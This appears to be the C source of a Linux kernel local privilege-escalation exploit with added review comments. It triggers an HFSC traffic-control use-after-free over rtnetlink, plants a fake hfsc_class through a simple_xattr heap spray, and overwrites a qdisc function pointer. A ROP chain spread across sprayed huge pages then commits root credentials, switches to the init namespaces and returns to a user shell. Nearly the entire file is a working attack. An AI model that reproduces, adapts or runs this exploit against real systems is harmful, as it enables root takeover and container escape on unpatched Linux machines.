#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <sched.h>
#include <errno.h>
#include <net/if.h>
#include <sys/socket.h>
#include <sys/xattr.h>
#include <sys/syscall.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/pkt_cls.h>
#include <linux/pkt_sched.h>
#include <linux/if_arp.h>

#include "utils.h"

/* Prefetch kaslr leak */
/* NOTE(review): only MIN_STEXT is referenced in this file (main() derives
 * kernel_off from it); MAX_STEXT, BASE_INC and SYS_GETUID look unused here. */
#define MIN_STEXT 0xffffffff81000000
#define MAX_STEXT 0xffffffffbb000000
#define BASE_INC 0x1000000
#define SYS_GETUID 0x1a7440

/* simple_xattr spray: spray_simple_xattrs() attaches values of
 * XATTR_DATA_LEN bytes each; main() subtracts XATTR_HEADER_SIZE from the
 * hfsc_class offsets below when laying fields out inside xattr_buf. */
#define XATTR_SPRAY 32
#define XATTR_HEADER_SIZE 32
#define XATTR_SLAB_LEN 1024
#define XATTR_DATA_LEN (XATTR_SLAB_LEN/2)

/* hfsc_class offsets (bytes). Kernel-build specific — TODO confirm against
 * the target kernel's struct hfsc_class layout. */
#define LEVEL_OFFSET 100
#define CL_PARENT_OFFSET 112
#define VT_NODE_OFFSET 192
#define CF_NODE_OFFSET 224
#define CL_VT_OFFSET 280
#define CL_CVTMIN_OFFSET 312

/* Data offsets, added to the kernel base. Build specific. */
#define INIT_NSPROXY 0x26765c0
#define QFQ_CHANGE_QDISC_LOC 0x295d438

/* Function offsets, added to the kernel base. Build specific. */
#define PREPARE_KERNEL_CRED 0x1befb0
#define COMMIT_CREDS 0x1bed10
#define FIND_TASK_BY_VPID 0x1b5600
#define SWITCH_TASK_NAMESPACES 0x1bd180

/* Gadget offsets, added to the kernel base; each name spells the instruction
 * sequence expected at that offset. Build specific — TODO confirm. */
#define PUSH_RSI_JMP_QWORD_PTR_RSI_MINUS_0x70 0xdf26ac
#define PUSH_RDI_POP_RBX_POP_RBP_RET_THUNK 0x09e7eb
#define POP_RSP_POP_RBX_RET_THUNK 0x357c79
#define POP_RDI_RET_THUNK 0x088893
#define POP_RSI_RET_THUNK 0x0d88a3
#define POP_RDX_RET_THUNK 0x047e72
#define POP_RCX_RET_THUNK 0x0271ec
#define MOV_RDI_RAX_THUNK_RCX 0x817ea9
#define ADD_RAX_RCX_RET_THUNK 0x0d5f84
#define PUSH_RAX_JMP_RDX_THUNK 0x94dca7
#define POP_RSP_RET_THUNK 0x068961
#define MOV_RAX_R14_POP_R14_RET_THUNK 0xa210ac
#define POP_R14_RET_THUNK 0x0d88a2

/* Print perror(s) and terminate the process with EXIT_FAILURE. */
#define err_exit(s) do { perror(s); exit(EXIT_FAILURE); } while(0)

/*
 * Raw rtnetlink traffic-control request: netlink header, tcmsg, then a
 * fixed TC_DATA_LEN-byte area that the init_*_msg() builders append rtattrs
 * into. nh.nlmsg_len tracks how much of the struct is in use.
 *
 * NOTE(review): the builders never check against TC_DATA_LEN.
 * init_qfq_qdisc_msg() appends 8 + 116 + 516 = 640 bytes of attributes,
 * which exceeds this 512-byte area — confirm and enlarge if intended.
 */
struct tf_msg {
    struct nlmsghdr nh;
    struct tcmsg tm;
#define TC_DATA_LEN 512
    char attrbuf[TC_DATA_LEN];
};

/* rtnetlink link request: netlink header followed by ifinfomsg, no rtattrs. */
struct if_msg {
    struct nlmsghdr nh;
    struct ifinfomsg ifi;
};

/* Netlink message for setting loopback up. */
struct if_msg if_up_msg = {
    {
        .nlmsg_len = 32,
        .nlmsg_type = RTM_NEWLINK,
        .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK,
    },
    {
        .ifi_family = AF_UNSPEC,
        .ifi_type = ARPHRD_NETROM,
        .ifi_index = 1,
        .ifi_flags = IFF_UP,
        .ifi_change = 1,
    },

};


/* O_TMPFILE descriptor (opened in main) that spray_simple_xattrs() targets. */
int xattr_fd;
/* Payload buffers copied verbatim into the QFQ request by init_qfq_qdisc_msg(). */
char rop_buf[512];
char jop_buf[0x70];


// void init_rop (long *rop, long *jop, long kbase) {
//     *jop++ = 0xffffffffdeadbeef;
//     // /* restore rbx */
//     // *rop++ = kbase + PUSH_RDI_POP_RBX_POP_RBP_RET_THUNK;
//     // *rop++ = 0;
//     // /* commit_creds(prepare_kernel_cred(0)) */
//     // *rop++ = kbase + POP_RDI_RET_THUNK;
//     // *rop++ = 0;
//     // *rop++ = kbase + PREPARE_KERNEL_CRED;
//     // *rop++ = kbase + POP_RCX_RET_THUNK;
//     // *rop++ = kbase + COMMIT_CREDS;
//     // *rop++ = kbase + MOV_RDI_RAX_THUNK_RCX;
//     // /* switch_task_namespaces(find_task_by_vpid(1, init_ns_proxy) */
//     // *rop++ = kbase + POP_RDI_RET_THUNK;
//     // *rop++ = 1;
//     // *rop++ = kbase + FIND_TASK_BY_VPID;
//     // *rop++ = kbase + POP_RSI_RET_THUNK;
//     // *rop++ = kbase + INIT_NSPROXY;
//     // *rop++ = kbase + POP_RCX_RET_THUNK;
//     // *rop++ = kbase + SWITCH_TASK_NAMESPACES;
//     // *rop++ = kbase + MOV_RDI_RAX_THUNK_RCX;
//     // /* return back to the original stack */
//     // *rop++ = kbase + MOV_RAX_R14_POP_R14_RET_THUNK;
//     // *rop++ = 0;
//     // *rop++ = kbase + POP_RDX_RET_THUNK;
//     // *rop++ = kbase + POP_R14_RET_THUNK;
//     // *rop++ = kbase + PUSH_RAX_JMP_RDX_THUNK;
//     // *rop++ = kbase + POP_RCX_RET_THUNK;
//     // *rop++ = (long)-384;
//     // *rop++ = kbase + ADD_RAX_RCX_RET_THUNK;
//     // *rop++ = kbase + POP_RDX_RET_THUNK;
//     // *rop++ = kbase + POP_RSP_RET_THUNK;
//     // *rop++ = kbase + PUSH_RAX_JMP_RDX_THUNK;
// }

/* Helper functions for creating rtnetlink messages. */

/*
 * Write one rtattr (header + payload) at rta and return its unaligned
 * length, RTA_LENGTH(len). The caller advances by the aligned length and
 * is responsible for ensuring the destination has room.
 *
 * rta:  destination inside a message buffer. Typed void * so callers can
 *       pass a computed byte offset without casting.
 * type: attribute type (e.g. TCA_KIND, TCA_OPTIONS).
 * len:  payload length in bytes.
 * data: payload, any object pointer; copied with memcpy.
 */
unsigned short add_rtattr (void *rta, unsigned short type, unsigned short len, const void *data) {
    struct rtattr *attr = rta;
    attr->rta_type = type;
    attr->rta_len = RTA_LENGTH(len);
    memcpy(RTA_DATA(attr), data, len);
    return attr->rta_len;
}

/* tc handles pack major:minor as (major << 16) | minor. */
int vuln_class_id = 0x00010001; // 1:1, classid of vulnerable RSC parent.
int def_class_id = 0x00010002; // 1:2, classid where packets are enqueued.
/* Prebuilt tc requests: the first four are filled by init_nl_msgs(),
 * new_qfq_qdisc by init_qfq_qdisc_msg(). */
struct tf_msg newqd_msg, delc_msg, new_rsc_msg, new_fsc_msg, new_qfq_qdisc;

/*
 * Fill in the fields shared by every tc request:
 *   - request + ack flags;
 *   - PF_UNSPEC family and the "lo" interface index;
 *   - a length covering only nlmsghdr + tcmsg.
 * Type, handle, parent and attributes are left for the caller.
 * The struct is not zeroed here.
 */
void init_tf_msg (struct tf_msg *m) {
    struct nlmsghdr *hdr = &m->nh;
    struct tcmsg *tc = &m->tm;

    tc->tcm_family = PF_UNSPEC;
    tc->tcm_ifindex = if_nametoindex("lo");
    hdr->nlmsg_len = NLMSG_LENGTH(sizeof(*tc));
    hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
}

/*
 * Build an RTM_NEWQDISC request that creates an HFSC root qdisc with handle
 * 1: on the loopback device, with defcls = 2 (class 1:2).
 *
 * Attributes: TCA_KIND = "hfsc", TCA_OPTIONS = struct tc_hfsc_qopt.
 */
void init_qdisc_msg (struct tf_msg *m) {
    struct tc_hfsc_qopt qopt = { .defcls = 2 };

    init_tf_msg(m);
    m->nh.nlmsg_type = RTM_NEWQDISC;
    m->tm.tcm_parent = TC_H_ROOT;
    m->tm.tcm_handle = 1 << 16;
    m->nh.nlmsg_flags |= NLM_F_CREATE;

    /* Each attribute is appended at the current (aligned) end of the message. */
    struct rtattr *kind = (struct rtattr *)((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len));
    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr(kind, TCA_KIND, strlen("hfsc") + 1, "hfsc"));

    struct rtattr *opts = (struct rtattr *)((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len));
    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr(opts, TCA_OPTIONS, sizeof(qopt), (char *)&qopt));
}


/*
 * Build an RTM_NEWTCLASS request that creates HFSC class vuln_class_id (1:1)
 * under root qdisc 1:. The class gets only an RSC curve (TCA_HFSC_RSC) with
 * m1 = d = m2 = 1.
 */
void init_rsc_class_msg (struct tf_msg *m) {
    struct tc_service_curve rsc = { .m1 = 1, .d = 1, .m2 = 1 };

    init_tf_msg(m);
    m->nh.nlmsg_type = RTM_NEWTCLASS;
    m->tm.tcm_parent = 1 << 16;
    m->tm.tcm_handle = vuln_class_id;
    m->nh.nlmsg_flags |= NLM_F_CREATE;

    struct rtattr *kind = (struct rtattr *)((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len));
    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr(kind, TCA_KIND, strlen("hfsc") + 1, "hfsc"));

    /* TCA_OPTIONS is nested: open it empty, append the curve inside it,
     * then grow the outer message by the nested attribute's total length. */
    struct rtattr *opts = (struct rtattr *)((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len));
    opts->rta_type = TCA_OPTIONS;
    opts->rta_len = RTA_LENGTH(0);
    opts->rta_len += RTA_ALIGN(add_rtattr((struct rtattr *)((char *)opts + opts->rta_len),
                                          TCA_HFSC_RSC, sizeof(rsc), (char *)&rsc));
    m->nh.nlmsg_len += NLMSG_ALIGN(opts->rta_len);
}

/*
 * Build an RTM_NEWTCLASS request that creates HFSC class def_class_id (1:2)
 * as a child of vuln_class_id (1:1). The class gets only an FSC curve
 * (TCA_HFSC_FSC) with m1 = d = m2 = 1. main() later resends this request
 * with tcm_parent changed to the root qdisc 1:.
 */
void init_fsc_class_msg (struct tf_msg *m) {
    struct tc_service_curve fsc = { .m1 = 1, .d = 1, .m2 = 1 };

    init_tf_msg(m);
    m->nh.nlmsg_type = RTM_NEWTCLASS;
    m->tm.tcm_parent = vuln_class_id;
    m->tm.tcm_handle = def_class_id;
    m->nh.nlmsg_flags |= NLM_F_CREATE;

    struct rtattr *kind = (struct rtattr *)((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len));
    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr(kind, TCA_KIND, strlen("hfsc") + 1, "hfsc"));

    /* TCA_OPTIONS is nested: open it empty, append the curve inside it,
     * then grow the outer message by the nested attribute's total length. */
    struct rtattr *opts = (struct rtattr *)((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len));
    opts->rta_type = TCA_OPTIONS;
    opts->rta_len = RTA_LENGTH(0);
    opts->rta_len += RTA_ALIGN(add_rtattr((struct rtattr *)((char *)opts + opts->rta_len),
                                          TCA_HFSC_FSC, sizeof(fsc), (char *)&fsc));
    m->nh.nlmsg_len += NLMSG_ALIGN(opts->rta_len);
}

/*
 * Build an RTM_DELTCLASS request for class vuln_class_id with no attributes.
 * The request/ack flags come from init_tf_msg(). main() retargets this
 * request by overwriting tm.tcm_handle before sending.
 */
void init_del_class_msg (struct tf_msg *m) {
    init_tf_msg(m);
    m->tm.tcm_handle = vuln_class_id;
    m->nh.nlmsg_type = RTM_DELTCLASS;
}

/*
 * Build an RTM_NEWQDISC request for a "qfq" qdisc with handle 2: whose
 * parent is class 1:2. Two TCA_OPTIONS attributes are appended, carrying the
 * raw bytes of jop_buf and rop_buf. They are copied at call time, so both
 * buffers must already hold their final contents.
 *
 * NOTE(review): the three attributes total 8 + 116 + 516 = 640 bytes, but
 * struct tf_msg reserves only TC_DATA_LEN (512) bytes after tcmsg. This
 * writes past the end of *m — confirm and size the buffer accordingly.
 */
void init_qfq_qdisc_msg (struct tf_msg *m) {
    init_tf_msg(m);
    m->nh.nlmsg_type = RTM_NEWQDISC;
    m->tm.tcm_parent = 0x00010002;
    m->tm.tcm_handle = 2 << 16;
    m->nh.nlmsg_flags |= NLM_F_CREATE;
    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_KIND, strlen("qfq") + 1, "qfq"));
    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_OPTIONS, sizeof(jop_buf), jop_buf));
    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_OPTIONS, sizeof(rop_buf), rop_buf));
}

/*
 * Populate the HFSC requests used by main():
 *   - the root qdisc,
 *   - the RSC class 1:1,
 *   - the FSC class 1:2,
 *   - the class-delete request.
 * The QFQ request is built separately in main(), after jop_buf is written.
 */
void init_nl_msgs (void) {
    init_qdisc_msg(&newqd_msg);
    init_rsc_class_msg(&new_rsc_msg);
    init_fsc_class_msg(&new_fsc_msg);
    init_del_class_msg(&delc_msg);
}

/*
 * Send one netlink request and wait for its acknowledgement.
 *
 * msg must begin with a struct nlmsghdr whose nlmsg_len covers the whole
 * message; struct tf_msg and struct if_msg both qualify. It should carry
 * NLM_F_ACK, otherwise the kernel may send no reply and the read blocks.
 *
 * Failure handling:
 *   - A failed write() or read() terminates the process.
 *   - A negative error in the NLMSG_ERROR reply is stored in errno and
 *     reported with perror(), but is not fatal.
 *   - A reply too short to hold nlmsgerr.error, or of another type, is
 *     reported and otherwise ignored.
 */
void netlink_write (int sock, const void *msg) {
    const struct nlmsghdr *req = msg;
    struct {
        struct nlmsghdr nh;
        struct nlmsgerr ne;
    } ack;

    if (write(sock, msg, req->nlmsg_len) == -1)
        err_exit("[-] write");

    ssize_t got = read(sock, &ack, sizeof(ack));
    if (got == -1)
        err_exit("[-] read");

    /* Without a complete NLMSG_ERROR header + error field, ack.ne.error
     * would be uninitialised stack memory. */
    if ((size_t)got < sizeof(ack.nh) + sizeof(ack.ne.error) ||
        ack.nh.nlmsg_type != NLMSG_ERROR) {
        fprintf(stderr, "[-] netlink: unexpected reply\n");
        return;
    }

    if (ack.ne.error) {
        errno = -ack.ne.error;
        perror("[-] netlink");
    }
}

/*
 * Fire-and-forget variant of netlink_write(). It sends the request but never
 * reads a reply, so any reply stays queued on the socket. Only a failed
 * write() is fatal.
 */
void netlink_write_noerr (int sock, struct tf_msg *m) {
    ssize_t sent = write(sock, m, m->nh.nlmsg_len);
    if (sent != -1)
        return;
    err_exit("[-] write");
}

/*
 * Attach num_spray new extended attributes to xattr_fd. Each is named
 * "security.<n>" and holds the XATTR_DATA_LEN-byte contents of xattr_buf.
 * num_xattr is a running counter across calls, so names never repeat.
 * A failing fsetxattr() terminates the process.
 */
int num_xattr = 0;
char xattr_buf[XATTR_DATA_LEN];
void spray_simple_xattrs(int num_spray) {
    char name[32];
    int remaining = num_spray;
    while (remaining > 0) {
        /* "security." + an int always fits in 32 bytes. */
        snprintf(name, sizeof(name), "security.%d", num_xattr);
        if (fsetxattr(xattr_fd, name, xattr_buf, XATTR_DATA_LEN, 0) == -1)
            err_exit("[-] fsetxattr");
        num_xattr++;
        remaining--;
    }
}

/*
 * Send a single one-byte UDP datagram over a fresh socket. The socket is
 * connected to an AF_INET address whose remaining bytes are all zero. The
 * datagram goes out via the loopback device, so the qdisc enqueue and
 * dequeue paths run. Any socket error terminates the process.
 */
void loopback_send (void) {
    struct sockaddr dst;
    memset(&dst, 0, sizeof(dst));
    dst.sa_family = AF_INET;

    int fd = socket(PF_INET, SOCK_DGRAM, 0);
    if (fd == -1)
        err_exit("[-] inet socket");
    if (connect(fd, &dst, sizeof(dst)) == -1)
        err_exit("[-] connect");
    if (write(fd, "", 1) == -1)
        err_exit("[-] inet write");
    close(fd);
}

/* Kernel text base used for absolute addresses, and its displacement from
 * 0xffffffff81000000 (both assigned in main()). */
uint64_t kernel_base, kernel_off = 0;

/*
 * Thread body started by spawn_orw_thread() via clone(CLONE_VM).
 *
 * Steps:
 *   1. Pin itself to args->cpu.
 *   2. Poll spray_pgs[range_start .. range_end) until a page has byte 0x2b
 *      at offset 0x1ff8, or the shared `found` is already non-zero.
 *   3. Record that page in `found`.
 *   4. Write two qwords at found + 0x1f10 in an endless loop: the address
 *      in pop_rsp_ret, then guess + 0x4000.
 *
 * It never returns; the trailing `return 0` is unreachable.
 *
 * NOTE(review): `found`, struct orw_thread_args, pin_cpu, u8 and u64 are not
 * declared in this file — presumably from utils.h. If `found` is a plain
 * (non-volatile, non-atomic) global, the compiler may hoist the `found != 0`
 * check out of the loop — confirm its declaration.
 * NOTE(review): "%lx" for a u64 assumes u64 is unsigned long; PRIx64 is
 * portable.
 */
__attribute__ ((optimize(2)))
int orw_thread(void *args) {
    struct orw_thread_args *orw_args = (struct orw_thread_args *)args;
    int cpu = orw_args->cpu;
    void **spray_pgs = orw_args->spray_pgs;
    u64 guess = orw_args->guess;

    int start = orw_args->range_start;
    int end = orw_args->range_end;

    pin_cpu(cpu);

    printf("cpu: %d, spray_pgs: %p, guess: %lx\n", cpu, spray_pgs, guess );

    uint64_t pop_rsp_ret = 0xffffffff824006f2 + kernel_off; // pop rsp ; ret

    while (1) {
        for (int i = start; i < end; i++) {
            if (((u8 *)spray_pgs[i])[0x1ff8] == 0x2b || found != 0) {
                // found guess page, spam overwrite
                if (found == 0) {
                    found = spray_pgs[i];
                }
                volatile u64 *full_chain_phys = (u64 *)(guess + 0x4000);

                // stack offset in syscall_enter_from_user_mode_prepare+0x6
                volatile u64 *stack_orw_target1 = (u64 *)(found + 0x01ee8+0x28);

                /* Rewrite continuously; never exits. */
                while (1) {
                    stack_orw_target1[0] = pop_rsp_ret;
                    stack_orw_target1[1] = (u64)full_chain_phys;
                }
            }
        }
    }

    return 0;
}

/*
 * Start orw_thread() on a new 16 KiB stack that shares this address space
 * (clone with CLONE_VM).
 *
 * cpu:       CPU the thread pins itself to.
 * spray_pgs: page array the thread scans. Only the pointer is stored, so the
 *            array must outlive the thread.
 * guess:     value forwarded to the thread.
 * start/end: half-open index range of spray_pgs to scan.
 *
 * Exits the process if the stack mapping, the argument allocation or
 * clone() fails. The stack and argument block are never freed.
 */
void spawn_orw_thread(int cpu, void *spray_pgs[], u64 guess, int start, int end) {
    enum { ORW_STACK_SIZE = 0x4000 };

    void *stack = mmap(0, ORW_STACK_SIZE, PROT_READ|PROT_WRITE, MAP_ANON|MAP_PRIVATE, -1, 0);
    if (stack == MAP_FAILED) {
        perror("mmap");
        exit(1);
    }

    struct orw_thread_args *args = malloc(sizeof(*args));
    if (args == NULL) {
        perror("malloc");
        exit(1);
    }
    args->cpu = cpu;
    args->spray_pgs = spray_pgs;
    args->guess = guess;
    args->range_start = start;
    args->range_end = end;

    /* clone() takes the top of the child stack (the stack grows down on x86). */
    if (clone(orw_thread, (char *)stack + ORW_STACK_SIZE, CLONE_VM, args) == -1) {
        perror("clone");
        exit(1);
    }
}

/*
 * Entry point. Phases, in order:
 *   1. Pin to CPU 0, call save_state(), set kernel_base/kernel_off.
 *   2. Map 128 huge pages, compute a 2 MiB-aligned `guess` address, load it
 *      into the user GS base with wrgsbase, and start orw_thread on CPU 1.
 *   3. Write three pointers and a chain of 21 qwords (at +0x4000) into
 *      every sprayed page.
 *   4. Enter new user and network namespaces, open an O_TMPFILE and an
 *      rtnetlink socket, and bring "lo" up.
 *   5. Run the HFSC qdisc/class create, send and delete sequence. Then
 *      place a fake hfsc_class in xattr_buf and spray it.
 *   6. Recreate the default class and send a packet. Finally build the QFQ
 *      qdisc request and send it twice without reading replies.
 *
 * NOTE(review): argc/argv are unused; main falls off the end (returns 0).
 * pin_cpu, save_state, allocate_huge_page, shell and user_* are not declared
 * in this file — presumably from utils.h.
 * NOTE(review): `spray_pgs[i] + off` is arithmetic on void *, a GNU
 * extension. "%lx" for u64 assumes unsigned long; PRIx64 is portable.
 */
int main (int argc, char **argv) {

    pin_cpu(0);
    save_state();

    /* NOTE(review): kernel_base is hard-coded to MIN_STEXT, so kernel_off
     * is always 0 and every address below assumes the default, unslid
     * kernel base — TODO confirm or supply the real base. */
    kernel_base = 0xffffffff81000000;
    kernel_off = kernel_base - MIN_STEXT;

    void *spray_pgs[128];
    for (int i = 0; i < 128; i ++) {
        spray_pgs[i] = allocate_huge_page();
        printf("spray_pgs[%d] : %p\n", i, spray_pgs[i]);
    }

    /* 2 MiB-aligned address three quarters of the way into a
     * 128 x 2 MiB window that starts at guesses_start. */
    u64 guesses_start = 0xffff888104000000;
    u64 guess = (guesses_start + 3 * ((128<<21)/4)) & ~((1<<21)-1);
    printf("guess: %lx\n", guess);

    asm volatile("wrgsbase %0" :: "r" (guess) : "memory");

    spawn_orw_thread(1, spray_pgs, guess, 0, 128);

    usleep(1000);

    u64 gs_pivot_offset = 0x20c90;
    u64 gs_stack_addr = (u64)(guess + 0x2000);

    /* The same three qwords are written into every sprayed page. */
    for (int i = 0; i < 128; i++) {
        *(u64 *)(spray_pgs[i] + gs_pivot_offset) = gs_stack_addr;
        *(u64 *)(spray_pgs[i] + 0x20cc0) = guess + 0x3000;
        *(u64 *)(spray_pgs[i] + 0x3000 + 0x560) = guess + 0x3000;
    }

    /* NOTE(review): several entries below re-spell the offset macros from
     * the top of the file (0x1bed10 == COMMIT_CREDS, 0x1b5600 ==
     * FIND_TASK_BY_VPID, 0x0d88a3 == POP_RSI_RET_THUNK, 0x26765c0 ==
     * INIT_NSPROXY, 0x0271ec == POP_RCX_RET_THUNK, 0x1bd180 ==
     * SWITCH_TASK_NAMESPACES, 0x817ea9 == MOV_RDI_RAX_THUNK_RCX).
     * Using the macros would keep them in sync. */
    for (int i = 0; i < 128; i++) {
        u64 *full_chain_usr = spray_pgs[i] + 0x4000;
        int counter = 0;
        full_chain_usr[counter++] = kernel_off + 0xffffffff810021ea;//pop rdi; ret
        full_chain_usr[counter++] = 0x0;
        full_chain_usr[counter++] = kernel_off + 0xffffffff82141df1;
        /*
            0xffffffff82141df1 <__wrgsbase_inactive+33>: wrgsbase rdi
            0xffffffff82141df6 <__wrgsbase_inactive+38>: swapgs
            0xffffffff82141df9 <__wrgsbase_inactive+41>: ret
         */
        full_chain_usr[counter++] = kernel_off + 0xffffffff810021ea;//pop rdi; ret
        full_chain_usr[counter++] = kernel_off + 0xffffffff83676800;//init_cred
        full_chain_usr[counter++] = kernel_off + 0xffffffff811bed10;//commit_creds;

        full_chain_usr[counter++] = kernel_off + 0xffffffff810021ea;//pop rdi; ret
        full_chain_usr[counter++] = 1;
        full_chain_usr[counter++] = kernel_off + 0xffffffff81000000 + 0x1b5600;//find_task_by_vpid
        full_chain_usr[counter++] = kernel_off + 0xffffffff81000000 + 0x0d88a3; //pop rsi ; ret
        full_chain_usr[counter++] = kernel_off + 0xffffffff81000000 + 0x26765c0;//init_nsproxy

        full_chain_usr[counter++] = kernel_off + 0xffffffff81000000 + 0x0271ec; //pop rcx ; ret
        full_chain_usr[counter++] = kernel_off + 0xffffffff81000000 + 0x1bd180; //switch_task_namespaces
        full_chain_usr[counter++] = kernel_off + 0xffffffff81000000 + 0x817ea9; //mov rdi, rax ; jmp rcx

        full_chain_usr[counter++] = kernel_off + 0xffffffff82201218;//swapgs; ret
        full_chain_usr[counter++] = kernel_off + 0xffffffff82201747;//iretq
        full_chain_usr[counter++] = (uint64_t)shell;
        full_chain_usr[counter++] = user_cs;
        full_chain_usr[counter++] = user_rflags;
        full_chain_usr[counter++] = user_rsp|8;
        full_chain_usr[counter++] = user_ss;
    }

    if (unshare(CLONE_NEWUSER) == -1)
        err_exit("[-] unshare(CLONE_NEWUSER)");
    if (unshare(CLONE_NEWNET) == -1)
        err_exit("[-] unshare(CLONE_NEWNET)");

    /* Open temporary file to use for xattr spray */
    xattr_fd = open("/tmp/", O_TMPFILE | O_RDWR, 0664);
    if (xattr_fd == -1)
        err_exit("[-] open");

    /* Open socket to send netlink commands to */
    int nl_sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
    if (nl_sock_fd == -1)
        err_exit("[-] nl socket");

    /* Set loopback device up */
    if_up_msg.ifi.ifi_index = if_nametoindex("lo");
    netlink_write(nl_sock_fd, &if_up_msg);

    init_nl_msgs();

    /* Trigger vuln */
    netlink_write(nl_sock_fd, &newqd_msg);
    netlink_write(nl_sock_fd, &new_rsc_msg);
    netlink_write(nl_sock_fd, &new_fsc_msg);
    loopback_send();
    delc_msg.tm.tcm_handle = def_class_id;
    netlink_write(nl_sock_fd, &delc_msg);

    printf("[*] Triggered vulnerability\n");

    /* Place fake hfsc_class in xattr */

    /* hfsc_class.level = 1 (must be non-zero) */
    xattr_buf[LEVEL_OFFSET - XATTR_HEADER_SIZE] = 1;
    /* hfsc_class.vt_node = 1 (must be odd) */
    xattr_buf[VT_NODE_OFFSET - XATTR_HEADER_SIZE] = 1;
    /* hfsc_class.cf_node = 1 (must be odd) */
    xattr_buf[CF_NODE_OFFSET - XATTR_HEADER_SIZE] = 1;
    /* hfsc_class.parent = &qfq_change_qdisc (write target)*/
    long parent = kernel_base + QFQ_CHANGE_QDISC_LOC - CL_CVTMIN_OFFSET;
    memcpy(xattr_buf + CL_PARENT_OFFSET - XATTR_HEADER_SIZE, &parent, 8);
    /* hfsc_class.cl_vt = jop_gadget (write value) */
    long cl_vt = kernel_base + PUSH_RSI_JMP_QWORD_PTR_RSI_MINUS_0x70;
    memcpy(xattr_buf + CL_VT_OFFSET - XATTR_HEADER_SIZE, &cl_vt, 8);

    printf("[*] Spraying simple_xattrs...\n");
    /* Spray simple_xattrs */
    delc_msg.tm.tcm_handle = vuln_class_id;
    netlink_write(nl_sock_fd, &delc_msg);
    spray_simple_xattrs(XATTR_SPRAY);

    /* Create new default class and trigger enqueue/dequeue to overwrite
     * qfq_change_qdisc with jop gadget */
    new_fsc_msg.tm.tcm_parent = 1 << 16;
    netlink_write(nl_sock_fd, &new_fsc_msg);

    printf("[*] Overwriting function pointer\n");
    loopback_send();

    /* Prepare ROP chain at an offset of 4 bytes. With the 4-byte rtattr
    header it will be at an 8-byte offset from rsi, allowing it to be reached
    with `push rsi ; pop rsp ; pop rbx` for the stack pivot */
    /* NOTE(review): the comment above is stale. init_rop() is commented out
     * and rop_buf is not written anywhere in this file; only the first
     * qword of jop_buf is set below. */
    // init_rop(rop_buf + 4, jop_buf, kernel_base);

    uint64_t entry_SYSCALL_compat = 0xffffffff82201800 + kernel_off;
    // uint64_t entry_SYSCALL_compat = 0xffffffffdeadbeef;
    *(uint64_t *)(jop_buf) = entry_SYSCALL_compat;

    /* Create QFQ qdisc */
    init_qfq_qdisc_msg(&new_qfq_qdisc);
    netlink_write_noerr(nl_sock_fd, &new_qfq_qdisc);

    /* Call overwritten function pointer */
    printf("[*] Triggering ROP chain\n");
    netlink_write_noerr(nl_sock_fd, &new_qfq_qdisc);

}
